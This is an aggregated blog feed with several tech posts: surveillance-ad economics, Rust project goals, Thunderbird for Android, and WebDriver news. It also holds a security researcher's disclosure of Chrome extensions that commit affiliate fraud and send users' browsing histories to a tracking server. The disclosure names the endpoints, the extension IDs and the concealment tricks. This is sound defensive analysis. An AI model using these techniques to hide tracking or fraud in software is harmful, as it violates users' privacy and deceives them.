Donald Trump Talked About Fixing McDonald’s Ice Cream Machines. Lina Khan Actually Did. Back in March, the FTC submitted a comment to the US Copyright Office asking to extend the right to repair certain equipment, including commercial soft-serve equipment.

An awful lot of FOSS should thank the Academy Linux and open source in general seem to be huge components of the movie special effects industry – to an extent that we had not previously realized. (unless you have a stack of old Linux Journal back issues from the early 2000s—we did a lot of movie covers at the time that much of this software was being developed.)

Using an 8K TV as a Monitor For programming, word processing, and other productive work, consider getting an 8K TV instead of a multi-monitor setup. An 8K TV will have superior image quality, resolution, and versatility compared to multiple 4K displays, at roughly the same size. (huge TVs are an under-rated, subsidized technology, like POTS lines. Most or all of the huge TVs available today are smart and sold with the expectation that they’ll drive subscription and advertising revenue, which means a discount for those who use them as monitors.)

Suchir Balaji, who spent four years at OpenAI, says OpenAI’s use of copyrighted data broke the law and failed to meet fair use criteria; he left in August 2024 Mr. Balaji believes the threats are more immediate. ChatGPT and other chatbots, he said, are destroying the commercial viability of the individuals, businesses and internet services that created the digital data used to train these A.I. systems.

The Unlikely Inventor of the Automatic Rice Cooker Fumiko, the mother of six children, spent five years researching and testing to document the ideal recipe. She continued to make rice three times a day, carefully measuring water-to-rice ratios, noting temperatures and timings, and prototyping rice-cooker designs. Conventional wisdom was that the heat source needed to be adjusted continuously to guarantee fluffy rice, but Fumiko found that heating the water and rice to a boil and then cooking for exactly 20 minutes produced consistently good results.

Comments on TSA proposal for decentralized nonstandard ID requirements Compliance with the REAL-ID Act requires a state to electronically share information concerning all driver’s licenses and state-issued IDs with all other states, but not all states do so. Because no state complies with this provision of the REAL-ID Act, or could do so unless and until all states do so, no state-issued driver’s licenses or ID cards comply with the REAL-ID Act.

Don Martior we could just not

previously: Sunday Internet optimism

The consensus, dismal future of the Internet is usually wrong. Dystopias make great fiction, but the Internet is surprisingly good at muddling through and reducing each one to nuisance level.

  • We don’t have Clipper Chip dystopia that would have put backdoors in all cryptography.

  • We don’t have software patent cartel dystopia that would have locked everyone in to limited software choices and functionality, and a stagnant market.

  • We don’t have Fritz Chip dystopia that would have mandated Digital Rights Management on all devices.

None of these problems have gone away entirely—encryption backdoors, patent trolls, and DRM are all still there—but none have reached either Internet-wide catastrophe level or faded away entirely.

Today’s hottest new dystopia narrative is that we’re going to end up with surveillance advertising features in web browsers. They’ll be mathematically different from old-school cookie tracking, so technically they won’t make it possible to identify anyone individually, but they’ll still impose the same old surveillance risks on users, since real-world privacy risks are collective.

Compromising with the dystopia narrative always looks like the realistic or grown-up path forward, until it doesn’t. And then the non-dystopia timeline generally looks inevitable once you get far enough along it. This time it’s the same way. We don’t need cross-context personalized (surveillance) advertising in our web browsers any more than we need SCO licensesnot counting the SCO license timeline as dystopia, but another good example of dismal timeline averted in our operating systems. Let’s look at the numbers. I’m going to make all the assumptions most favorable to the surveillance advertising argument. It’s actually probably a lot better than this. And it’s probably better in other countries, since the USA is relatively advanced in the commercial surveillance field. (If you have these figures for other countries, please let me know and I’ll link to them.)

Total money spent on advertising in the USA: $389.49 billion

USA population: 335,893,238

That comes out to about $1,160 spent on advertising to reach the average person in the USA every year. That’s $97 per month.

So let’s assume (again, making the assumption most favorable to the surveillance side) that all advertising is surveillance advertising. And ads without the surveillance, according to Professor Garrett Johnson are worth 52 percent less than the surveillance ads.

So if you get rid of the surveillance, your ad subsidy goes from $97 to $46. Advertisers would be spending $51 less to advertise to you, and the missing $51 is a good-sized amount of extra money to come up with every month. But remember, that’s advertising money, total, not the amount that actually makes it to the people who make the ad-supported resources you want. Since the problem is how to replace the income for the artists, writers, and everyone else who makes ad-supported content, we need to multiply the missing ad subsidy by the fraction of that top-level advertising total that makes it through to the content creator in order to come up with the amount of money that needs to be filled in from other sources like subscriptions and memberships.

How much do you need to spend on subscriptions to replace $51 in ad money? That’s going to depend on your habits. But even if you have everything set up totally right, a dollar spent on ads to reach you will buy you less than a dollar you spend yourself. Thomas Baekdal writes, in How independent publishing has changed from the 1990s until today,

Up until this point, every publisher had focused on ‘traffic at scale’, but with the new direct funding focus, every individual publisher realized that traffic does not equal money, and you could actually make more money by having an audience who paid you directly, rather than having a bunch of random clicks for the sake of advertising. The ratio was something like 1:10,000. Meaning that for every one person you could convince to subscribe, donate, become a member, or support you on Patreon … you would need 10,000 visitors to make the same amount from advertising. Or to put that into perspective, with only 100 subscribers, I could make the same amount of money as I used to earn from having one million visitors.

All surveillance ad media add some kind of adtech tax. The Association of National Advertisers found that about 1/3 of the money spent to buy ad space makes it through to the publisher.

A subscription platform and subscriber services impose some costs too. To be generous to the surveillance side, let’s say that a subscription dollar is only three times as valuable as an advertising dollar. So that $51 in missing ad money means you need to come up with $17 from somewhere. This estimate is really on the high side in practice. A lot of ad money goes to overhead and to stuff like retail ad networks (online sellers bidding for better spots in shopping search results) and to ad media like billboards that don’t pay for content at all.

So, worst case, where do you get the $17? From buying less crap, that’s where. Mustri et al.(PDF) write,

[behaviorally] targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products…

You also get a piece of the national security and other collective security benefits of eliminating surveillance, some savings in bandwidth and computing resources, and a lower likelihood of becoming a victim of fraud and identity theft. But that’s pure bonus benefit on top of the win from saving money by spending less on overpriced, personally targeted, low-quality products. (If privacy protection didn’t help you buy better stuff, the surveillance companies would have said so by now.) Because surveillance advertising gives an advantage to deceptive advertisers over legit ones, the end of surveillance advertising would also mean an increase in sales for legit brands.

And we’re not done. As a wise man once said, But wait! There’s more! Before you rush to do effective privacy tips or write to your state legislators to support anti-surveillance laws, there’s one more benefit for getting rid of surveillance/personalized advertising. Remember that extra $51 that went away? It didn’t get burned up in a fire just because it didn’t get spent on surveillance advertising. Companies still have it, and they still want to sell you stuff. Without surveillance, they’ll have to look for other ways to spend it. And many of the options are win-win for the customer. In Product is the P all marketers should strive to influence, Mark Ritson points out the marketing wins from incremental product improvements, and that’s the kind of work that often gets ignored in favor of niftier, short-term, surveillance advertising projects. Improving service and pricing are other areas that will will also do better without surveillance advertising contending for budgets. There is a lot of potential gain for a lot of people in getting rid of surveillance advertising, so let’s not waste the opportunity. Don’t worry, we’ll get another Internet dystopia narrative to worry about eventually.

More: stop putting privacy-enhancing technologies in web browsers

Related

Product is the P all marketers should strive to influence If there is one thing I have learned from a thousand customers discussing a hundred different products it’s that the things a company thinks are small are, from a consumer perspective, big. And the grand improvements the company is spending bazillions on are probably of little significance. Finding out from the source what needs to be fixed or changed and then getting it done is the quiet product work of proper marketers. (yes, I linked to this twice.)

I Bought Tech Dupes on Temu. The Shoddy Gear Wasn’t Worth the $1,260 in Savings My journey into the shady side of shopping brought me to the world of dupes — from budget alternatives to bad knockoffs of your favorite tech.

Political fundraisers WinRed and ActBlue are taking millions of dollars in donations from elderly dementia patients to fuel their campaigns [S]some of these elderly, vulnerable consumers have unwittingly given away six-figure sums – most often to Republican candidates – making them among the country’s largest grassroots political donors.

Bonus links

Marketers in a dying internet: Why the only option is a return to simplicity With machine-generated content now cluttering the most visible online touchpoints (like the frontpage of Google, or your Facebook timeline), it feels inevitable that consumer behaviors will shift as a result. And so marketers need to change how they reach target audiences.

I attended Google’s creator conversation event, and it turned into a funeral

Is AI advertising going to be too easy for its own good? As Rory Sutherland said, When human beings process a message, we sort of process how much effort and love has gone into the creation of this message and we pay attention to to the message accordingly. It’s costly signaling of a kind.

How Google is Killing Bloggers and Small Publishers – And Why

Exploiting Meta’s Weaknesses, Deceptive Political Ads Thrived on Facebook and Instagram in Run-Up to Election

Ninth Circuit Upholds AADC Ban on “Dark Patterns”

Economist ‘future-proofing’ bid brings back brand advertising and targets students

The Talospace ProjectUpdated Baseline JIT OpenPOWER patches for Firefox 128ESR

I updated the Baseline JIT patches to apply against Firefox 128ESR, though if you use the Mercurial rebase extension (and you should), it will rebase automatically and only one file had to be merged — which it did for me also. Nevertheless, everything is up to date against tip again, and this patchset works fine for both Firefox and Thunderbird. I kept the fix for bug 1912623 because I think Mozilla's fix in bug 1909204 is wrong (or at least suboptimal) and this is faster on systems without working Wasm. Speaking of, I need to get back into porting rr to ppc64le so I can solve those startup crashes.

Mozilla Performance BlogPerformance Testing Newsletter (Q3 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products.

Last quarter was MozWeek, and we had a great time meeting a number of you in our PerfTest Regression Workshop – thank you all for joining us, and making it a huge success! If you didn’t get a chance to make it, you can find the slides here, and most of the information from the workshop (including some additional bits) can be found in this documentation page. We will be running this workshop again next MozWeek, along with a more advanced version.

See below for highlights from the changes made in the last quarter.

Highlights

Blog Posts ✍️

Contributors

  • Myeongjun Go [:myeongjun]
  • Mayank Bansal [:mayankleoboy1]

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Rust Programming Language BlogOctober project goals update

The Rust project is currently working towards a slate of 26 project goals, with 3 of them designed as flagship goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

The biggest elements of our goal are solving the "send bound" problem via return-type notation (RTN) and adding support for async closures. This month we made progress towards both. For RTN, @compiler-errors extended the return-type notation landed support for using RTN in self-types like where Self::method(): Send. He also authored a blog post with a call for testing explaining what RTN is and how it works. For async closures, the lang team reached a preliminary consensus on the async Fn syntax, with the understanding that it will also include some "async type" syntax. This rationale was documented in RFC #3710, which is now open for feedback. The team held a design meeting on Oct 23 and @nikomatsakis will be updating the RFC with the conclusions.

We have also been working towards a release of the dynosaur crate that enables dynamic dispatch for traits with async functions. This is intended as a transitionary step before we implement true dynamic dispatch. The next steps are to polish the implementation and issue a public call for testing.

With respect to async drop experiments, @nikomatsakis began reviews. It is expected that reviews will continue for some time as this is a large PR.

Finally, no progress has been made towards async WG reorganization. A meeting was scheduled but deferred. @tmandry is currently drafting an initial proposal.

We have made significant progress on resolving blockers to Linux building on stable. Support for struct fields in the offset_of! macro has been stabilized. The final naming for the "derive-smart-pointer" feature has been decided as #[derive(CoercePointee)]; @dingxiangfei2009 prepared PR #131284 for the rename and is working on modifying the rust-for-linux repository to use the new name. Once that is complete, we will be able to stabilize. We decided to stabilize support for references to statics in constants pointers-refs-to-static feature and are now awaiting a stabilization PR from @dingxiangfei2009.

Rust for Linux (RfL) is one of the major users of the asm-goto feature (and inline assembly in general) and we have been examining various extensions. @nbdd0121 authored a hackmd document detailing RfL's experiences and identifying areas for improvement. This led to two immediate action items: making target blocks safe-by-default (rust-lang/rust#119364) and extending const to support embedded pointers (rust-lang/rust#128464).

Finally, we have been finding an increasing number of stabilization requests at the compiler level, and so @wesleywiser and @davidtwco from the compiler team have started attending meetings to create a faster response. One of the results of that collaboration is RFC #3716, authored by Alice Ryhl, which proposes a method to manage compiler flags that modify the target ABI. Our previous approach has been to create distinct targets for each combination of flags, but the number of flags needed by the kernel make that impractical. Authoring the RFC revealed more such flags than previously recognized, including those that modify LLVM behavior.

The Rust 2024 edition is progressing well and is on track to be released on schedule. The major milestones include preparing to stabilize the edition by November 22, 2024, with the actual stabilization occurring on November 28, 2024. The edition will then be cut to beta on January 3, 2025, followed by an announcement on January 9, 2025, indicating that Rust 2024 is pending release. The final release is scheduled for February 20, 2025.

The priorities for this edition have been to ensure its success without requiring excessive effort from any individual. The team is pleased with the progress, noting that this edition will be the largest since Rust 2015, introducing many new and exciting features. The process has been carefully managed to maintain high standards without the need for high-stress heroics that were common in past editions. Notably, the team has managed to avoid cutting many items from the edition late in the development process, which helps prevent wasted work and burnout.

All priority language items for Rust 2024 have been completed and are ready for release. These include several key issues and enhancements. Additionally, there are three changes to the standard library, several updates to Cargo, and an exciting improvement to rustdoc that will significantly speed up doctests.

This edition also introduces a new style edition for rustfmt, which includes several formatting changes.

The team is preparing to start final quality assurance crater runs. Once these are triaged, the nightly beta for Rust 2024 will be announced, and wider testing will be solicited.

Rust 2024 will be stabilized in nightly in late November 2024, cut to beta on January 3, 2025, and officially released on February 20, 2025. More details about the edition items can be found in the Edition Guide.

Goals with updates

  • camelid has started working on using the new lowering schema for more than just const parameters, which once done will allow the introduction of a min_generic_const_args feature gate.
  • compiler-errors has been working on removing the eval_x methods on Const that do not perform proper normalization and are incompatible with this feature.
  • Posted the September update.
  • Created more automated infrastructure to prepare the October update, utilizing an LLM to summarize updates into one or two sentences for a concise table.
  • No progress has been made on this goal.
  • The goal will be closed as consensus indicates stabilization will not be achieved in this period; it will be revisited in the next goal period.
  • No major updates to report.
  • Preparing a talk for next week's EuroRust has taken away most of the free time.
  • Key developments: With the PR for supporting implied super trait bounds landed (#129499), the current implementation is mostly complete in that it allows most code that should compile, and should reject all code that shouldn't.
  • Further testing is required, with the next steps being improving diagnostics (#131152), and fixing more holes before const traits are added back to core.
  • A working-in-process pull request is available at https://github.com/weihanglo/cargo/pull/66.
  • The use of wasm32-wasip1 as a default sandbox environment is unlikely due to its lack of support for POSIX process spawning, which is essential for various build script use cases.
  • The Autodiff frontend was merged, including over 2k LoC and 30 files, making the remaining diff much smaller.
  • The Autodiff middle-end is likely getting a redesign, moving from a library-based to a pass-based approach for LLVM.
  • Significant progress was made with contributions by @x-hgg-x, improving the resolver test suite in Cargo to check feature unification against a SAT solver.
  • This was followed by porting the test cases that tripped up PubGrub to Cargo's test suite, laying the groundwork to prevent regression on important behaviors when Cargo switches to PubGrub and preparing for fuzzing of features in dependency resolution.
  • The team is working on a consensus for handling generic parameters, with both PRs currently blocked on this issue.
  • Attempted stabilization of -Znext-solver=coherence was reverted due to a hang in nalgebra, with subsequent fixes improving but not fully resolving performance issues.
  • No significant changes to the new solver have been made in the last month.
  • GnomedDev pushed rust-lang/rust#130553, which replaced an old Clippy infrastructure with a faster one (string matching into symbol matching).
  • Inspections into Clippy's type sizes and cache alignment are being started, but nothing fruitful yet.
  • The linting behavior was reverted until an unspecified date.
  • The next steps are to decide on the future of linting and to write the never patterns RFC.
  • The PR https://github.com/rust-lang/crates.io/pull/9423 has been merged.
  • Work on the frontend feature is in progress.
  • Key developments in the 'Scalable Polonius support on nightly' project include fixing test failures due to off-by-one errors from old mid-points, and ongoing debugging of test failures with a focus on automating the tracing work.
  • Efforts have been made to accept variations of issue #47680, with potential adjustments to active loans computation and locations of effects. Amanda has been cleaning up placeholders in the work-in-progress PR #130227.
  • rust-lang/cargo#14404 and rust-lang/cargo#14591 have been addressed.
  • Waiting on time to focus on this in a couple of weeks.
  • Key developments: Added the cases in the issue list to the UI test to reproduce the bug or verify the non-reproducibility.
  • Blockers: null.
  • Help wanted: Help test the deadlock code in the issue list and try to reproduce the issue.
  • Students from the CMU Practicum Project have started writing function contracts that include safety conditions for some unsafe functions in the core library, and verifying that safe abstractions respect those pre-conditions and are indeed safe.
  • Help is needed to write more contracts, integrate new tools, review pull requests, or participate in the repository discussions.
  • Progress has been made in matching rustc suggestion output within annotate-snippets, with most cases now aligned.
  • The focus has been on understanding and adapting different rendering styles for suggestions to fit within annotate-snippets.

Goals without updates

The following goals have not received updates in the last month:

Mozilla ThunderbirdThunderbird for Android 8.0 Takes Flight

Just over two years ago, we announced our plans to bring Thunderbird to Android by taking K-9 Mail under our wing. The journey took a little longer than we had originally anticipated and there was a lot to learn along the way, but the wait is finally over! For all of you who have ever asked “when is Thunderbird for Android coming out?”, the answer is – today! We are excited to announce that the first stable release of Thunderbird for Android is out now, and we couldn’t be prouder of the newest, most mobile member of the Thunderbird family.

Resources

Thanks for Helping Thunderbird for Android Fly

Thank you for being a part of the community and sharing this adventure on Android with us! We’re especially grateful to all of you who have helped us test the beta and release candidate images. Your feedback helped us find and fix bugs, test key features, and polish the stable release. We hope you enjoy using the newest Thunderbird, now and for a long time to come!

The post Thunderbird for Android 8.0 Takes Flight appeared first on The Thunderbird Blog.

Wladimir PalantThe Karma connection in Chrome Web Store

Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users’ every move to some Amazon cloud server. But that wasn’t all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don’t appear to be malicious yet.

While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than 50 people and secured tons of cash in venture capital. Maybe a mistake on my part?

After looking thoroughly this explanation seems unlikely. Not only does Karma share some backend infrastructure and considerable amounts of code with the malicious extensions. Not only does Karma Shopping Ltd. admit to selling users’ browsing profiles in their privacy policy. There is even more tying them together, including a mobile app developed by Karma Shopping Ltd. whereas the identical Chrome extension is supposedly developed by the mysterious evildoer.

Screenshot of the karmanow.com website, with the Karma logo visible and a yellow button “Add to Chrome - It’s Free”

The affected extensions

Most of the extensions in question changed hands relatively recently, the first ones in the summer of 2023. The malicious code has been added immediately after the ownership transfer, with some extensions even requesting additional privileges citing bogus reasons. A few extensions have been developed this year by whoever is behind this.

Some extensions from the latter group don’t have any obvious malicious functionality at this point. If there is tracking, it only covers the usage of the extension’s user interface rather than the entire browsing behavior. This can change at any time of course.

Name Weekly active users Extension ID Malicious functionality
Hide YouTube Shorts 100,000 aljlkinhomaaahfdojalfmimeidofpih Affiliate fraud, browsing profile collection
DarkPDF 40,000 cfemcmeknmapecneeeaajnbhhgfgkfhp Affiliate fraud, browsing profile collection
Sudoku On The Rocks 1,000 dncejofenelddljaidedboiegklahijo Affiliate fraud
Dynamics 365 Power Pane 70,000 eadknamngiibbmjdfokmppfooolhdidc Affiliate fraud, browsing profile collection
Israel everywhere 70 eiccbajfmdnmkfhhknldadnheilniafp
Karma | Online shopping, but better 500,000 emalgedpdlghbkikiaeocoblajamonoh Browsing profile collection
Where is Cookie? 93 emedckhdnioeieppmeojgegjfkhdlaeo
Visual Effects for Google Meet 1,000,000 hodiladlefdpcbemnbbcpclbmknkiaem Affiliate fraud
Quick Stickies 106 ihdjofjnmhebaiaanaeeoebjcgaildmk
Nucleus: A Pomodoro Timer and Website Blocker 20,000 koebbleaefghpjjmghelhjboilcmfpad Affiliate fraud, browsing profile collection
Hidden Airline Baggage Fees 496 kolnaamcekefalgibbpffeccknaiblpi Affiliate fraud
M3U8 Downloader 100,000 pibnhedpldjakfpnfkabbnifhmokakfb Affiliate fraud

Update (2024-11-11): Hide YouTube Shorts, DarkPDF, Nucleus and Hidden Airline Baggage Fees have been taken down. Two of them have been marked as malware and one as violating Chrome Web Store policies, meaning that existing extension users will be notified. I cannot see the reason for different categorization, the functionality being identical in all of these extensions. The other extensions currently remain active.

Hiding in plain sight

Whoever wrote the malicious code chose not to obfuscate it but to make it blend in with the legitimate functionality of the extension. Clearly, the expectation was that nobody would look at the code too closely. So there is for example this:

if (window.location.href.startsWith("http") ||
    window.location.href.includes("m.youtube.com")) {
  
}

It looks like the code inside the block would only run on YouTube. Only when you stop and consider the logic properly you realize that it runs on every website. In fact, that’s the block wrapping the calls to malicious functions.

The malicious functionality is split between content script and background worker for the same reason, even though it could have been kept in one place. This way each part looks innocuous enough: there is some data collection in the content script, and then it sends a check_shorts message to the background worker. And the background worker “checks shorts” by querying some web server. Together this just happens to send your entire browsing history into the Amazon cloud.

Similarly, there are some complicated checks in the content script which eventually result in a loadPdfTab message to the background worker. The background worker dutifully opens a new tab for that address and, strangely, closes it after 9 seconds. Only when you sort through the layers it becomes obvious that this is actually about adding an affiliate cookie.

And of course there is a bunch of usual complicated conditions, making sure that this functionality is not triggered too soon after installation and generally doesn’t pop up reliably enough that users could trace it back to this extension.

Affiliate fraud functionality

The affiliate fraud functionality is tied to the kra18.com domain. When this functionality is active, the extension will regularly download data from https://www.kra18.com/v1/selectors_list?&ex=90 (90 being the extension ID here, the server accepts eight different extension IDs). That’s a long list containing 6,553 host names:

Screenshot of JSON data displayed in the browser. The selectors key is expanded, twenty domain names like drinkag1.com are visible in the list.

Update (2024-11-19): As of now, the owners of this server disabled the endpoints mentioned here. You can still see the original responses on archive.today however.

Whenever one of these domains is visited and the moons are aligned in the right order, another request to the server is made with the full address of the page you are on. For example, the extension could request https://www.kra18.com/v1/extension_selectors?u=https://www.tink.de/&ex=90:

Screenshot of JSON data displayed in the browser. There are keys shortsNavButtonSelector, url and others. The url key contains a lengthy URL from awin1.com domain.

The shortsNavButtonSelector key is another red herring, the code only appears to be using it. The important key is url, the address to be opened in order to set the affiliate cookie. And that’s the address sent via loadPdfTab message mentioned before if the extension decides that right now is a good time to collect an affiliate commission.

There are also additional “selectors,” downloaded from https://www.kra18.com/v1/selectors_list_lr?&ex=90. Currently this functionality is only used on the amazon.com domain and will replace some product links with links going through jdoqocy.com domain, again making sure an affiliate commission is collected. That domain is owned by Common Junction LLC, an affiliate marketing company that published a case study on how their partnership with Karma Shopping Ltd. (named Shoptagr Ltd. back then) helped drive profits.

Browsing profile collection

Some of the extensions will send each page visit to https://7ng6v3lu3c.execute-api.us-east-1.amazonaws.com/EventTrackingStage/prod/rest. According to the extension code, this is an Alooma backend. Alooma is a data integration platform which has been acquired by Google a while ago. Data transmitted could look like this:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: token: sBGUbZm3hp, timestamp: 1730137880441, user_id: 90, distinct_id: 7796931211, navigator_language: en-US, referrer: https://www.google.com/, local_time: Mon Oct 28 2024 18:51:20 GMT+0100 (Central European Standard Time), event: page_visit, component: external_extension, external: true, current_url: https://example.com/

Yes, this is sent for each and every page loaded in the browser, at least after you’ve been using the extension for a while. And distinct_id is my immutable user ID here.

But wait, it’s a bit different for the Karma extension. Here you can opt out! Well, that’s only if you are using Firefox because Mozilla is rather strict about unexpected data collection. And if you manage to understand what “User interactions” means on this options page:

Screenshot of an options page with two switches labeled User interactions and URL address. The former is described with the text: Karma is a community of people who are working together to help each other get a great deal. We collect anonymized data about coupon codes, product pricing, and information about Karma is used to contribute back to the community. This data does not contain any personably identifiable information such as names or email addresses, but may include data supplied by the browser such as url address.

Well, I may disagree with the claim that url addresses do not contain personably identifiable information. And: yes, this is the entire page. There really isn’t any more text.

The data transmitted is also somewhat different:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: referrer: https://www.google.com/, current_url: https://example.com/, browser_version: 130, tab_id: 5bd19785-e18e-48ca-b400-8a74bf1e2f32, event_number: 1, browser: chrome, event: page_visit, source: extension, token: sBGUbZm3hp, version: 10.70.0.21414, timestamp: 1730138671937, user_id: 6372998, distinct_id: 6b23f200-2161-4a1d-9400-98805c17b9e3, navigator_language: en-US, local_time: Mon Oct 28 2024 19:04:31 GMT+0100 (Central European Standard Time), ui_config: old_save, save_logic: rules, show_k_button: true, show_coupon_scanner: true, show_popups: true

The user_id field no longer contains the extension ID but my personal identifier, complementing the identifier in distinct_id. There is a tab_id field adding more context, so that it is not only possible to recognize which page I navigated to and from where but also to distinguish different tabs. And some more information about my system is always useful of course.

Who is behind this?

Eleven extensions on my list are supposedly developed by a person going by the name Rotem Shilop or Roni Shilop or Karen Shilop. This isn’t a very common last name, and if this person really exists it managed to leave no traces online. Yes, I also searched in Hebrew. Yet one extension is developed by Karma Shopping Ltd. (formerly Shoptagr Ltd.), a company based in Israel with at least 50 employees. An accidental association?

It doesn’t look like it. I’m not going into the details of shared code and tooling, let’s just say: it’s very obvious that all twelve extensions are being developed by the same people. Of course, there is still the possibility that the eleven malicious extensions are not associated directly with Karma Shopping but with some rogue employee or contractor or business partner.

However, it isn’t only the code. As explained above, five extensions including Karma share the same tracking backend which is found nowhere else. They are even sending the same access token. Maybe this backend isn’t actually run by Karma Shopping and they are only one of the customers of some third party? Yet if you look at the data being sent, clearly the Karma extension is considered first-party. It’s the other extensions which are sending external: true and component: external_extension flags.

Then maybe Karma Shopping is merely buying data from a third party, without actually being affiliated with their extensions? Again, this is possible but unlikely. One indicator is the user_id field in the data sent by these extensions. It’s the same extension ID that they use for internal communication with the kra18.com server. If Karma Shopping were granting a third party access to their server, wouldn’t they assign that third party some IDs of their own?

And those affiliate links produced by the kra18.com server? Some of them clearly mention karmanow.com as the affiliate partner.

Screenshot of JSON data displayed in the browser. url key is a long link pointing to go.skimresources.com. sref query parameter of the link is https://karmanow.com. url query parameter of the link is www.runinrabbit.com.

Finally, if we look at Karma Shopping’s mobile apps, they develop two of them. In addition to the Karma app, the app stores also contain an app called “Sudoku on the Rocks,” developed by Karma Shopping Ltd. Which is a very strange coincidence because an identical “Sudoku on the Rocks” extension also exists in the Chrome Web Store. Here however the developer is Karen Shilop. And Karen Shilop chose to include hidden affiliate fraud functionality in their extension.

By the way, guess who likes the Karma extension a lot and left a five-star review?

Screenshot of a five-star review by Rona Shilop with a generic-looking avatar of woman with a cup of coffee. The review text says: Thanks for making this amazing free extension. There is a reply by Karma Support saying: We’re so happy to hear how much you enjoy shopping with Karma.

I contacted Karma Shopping Ltd. via their public relations address about their relationship to these extensions and the Shilop person but didn’t hear back so far.

Update (2024-10-30): An extension developer told me that they were contacted on multiple independent occasions about selling their Chrome extension to Karma Shopping, each time by C-level executives of the company, from official karmanow.com email addresses. The first outreach was in September 2023, where Karma was supposedly looking into adding extensions to their portfolio as part of their growth strategy. They offered to pay between $0.2 and $1 per weekly active user.

Update (2024-11-11): Another hint pointed me towards this GitHub issue. While the content has been removed here, you can still see the original content in the edit history. It’s the author of the Hide YouTube Shorts extension asking the author of the DarkPDF extension about that Karma company interested in buying their extensions.

What does Karma Shopping want with the data?

It is obvious why Karma Shopping Ltd. would want to add their affiliate functionality to more extensions. After all, affiliate commissions are their line of business. But why collect browsing histories? Only to publish semi-insightful articles on people’s shopping behavior?

Well, let’s have a look at their privacy policy which is actually meaningful for a change. Under 1.3.4 it says:

Browsing Data. In case you a user of our browser extensions we may collect data regarding web browsing data, which includes web pages visited, clicked stream data and information about the content you viewed.

How we Use this Data. We use this Personal Data (1) in order to provide you with the Services and feature of the extension and (2) we will share this data in an aggregated, anonymized manner, for marketing research and commercial use with our business partners.

Legal Basis. (1) We process this Personal Data for the purpose of providing the Services to you, which is considered performance of a contract with you. (2) When we process and share the aggregated and anonymized data we will ask for your consent.

First of all, this tells us that Karma collecting browsing data is official. They also openly state that they are selling it. Good to know and probably good for their business as well.

As to the legal basis: I am no lawyer but I have a strong impression that they don’t deliver on the “we will ask for your consent” promise. No, not even that Firefox options page qualifies as informed consent. And this makes this whole data collection rather doubtful in the light of GDPR.

There is also a difference between anonymized and pseudonymized data. The data collection seen here is pseudonymized: while it doesn’t include my name, there is a persistent user identifier which is still linked to me. It is usually fairly easy to deanonymize pseudonymized browsing histories, e.g. because people tend to visit their social media profiles rather often.

Actually anonymized data would not allow associating it with any single person. This is very hard to achieve, and we’ve seen promises of aggregated and anonymized data go very wrong. While it’s theoretically possible that Karma correctly anonymizes and aggregates data on the server side, this is a rather unlikely outcome for a company that, as we’ve seen above, confuses the lack of names and email addresses with anonymity.

But of course these considerations only apply to the Karma extension itself. Because related extensions like Hide YouTube Shorts just straight out lie:

Screenshot of a Chrome Web Store listing. Text under the heading Privacy: The developer has disclosed that it will not collect or use your data.

Some of these extensions actually used to have a privacy policy before they were bought. Now only three still have an identical and completely bogus privacy policy. Sudoku on the Rocks happens to be among these three, and the same privacy policy is linked by the Sudoku on the Rocks mobile apps which are officially developed by Karma Shopping Ltd.

Firefox Developer ExperienceFirefox WebDriver Newsletter 132

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 132 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

We are always grateful to receive external contributions, here are the ones which made it in Firefox 132:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi.

WebDriver BiDi

Retry commands to avoid AbortError failures

In release 132, one of our primary focus areas was enhancing the reliability of command execution.

Internally, we sometimes need to forward commands to content processes. This can easily fail, particularly when targeting a page which was either newly created or in the middle of a navigation. These failures often result in errors such as "AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved".

<- {
  "type":"error",
  "id":14,
  "error":"unknown error",
  "message":"AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved",
  "stacktrace":""
}

While there are valid technical reasons that prevent command execution in some cases, there are also many instances where retrying the command is a feasible solution.

The browsingContext.setViewport command was specifically updated in order to retry an internal command, as it was frequently failing. Then we updated our overall implementation in order to retry commands automatically if we detect that the page is navigating or about to navigate. Note that retrying commands is not entirely new, it’s an internal feature we were already using in a few handpicked commands. The changes in Firefox 132 just made its usage much more prevalent.

New preference: remote.retry-on-abort

To go one step further, we decided to allow all commands to be retried by default when the remote.retry-on-abort preference is set to true. Note that true is the default value, which means that with Firefox 132, all commands which need to reach the content process might now be retried (documentation). If you were previously relying on or working around the aforementioned AbortError, and notice an unexpected issue with Firefox 132, you can update this preference to make the behavior closer to previous Firefox versions. Please also file a Bug to let us know about the problem.

Bug fixes

Support.Mozilla.OrgContributor spotlight – Michele Rodaro

Hi Mozillians,

In today’s edition, I’d like to introduce you all to Michele Rodaro, a locale leader for Italian in the Mozilla Support platform. He is a professional architect, but finding pleasure and meaning in contributing to Mozilla since 2006. I’ve met him on several occasions in the past, and reading his answers feels exactly like talking to him in real life. I’m sure you can sense his warmth and kindness just by reading his responses. Here’s a beautiful analogy from Michele about his contributions to Mozilla as they relate to his background in architecture:

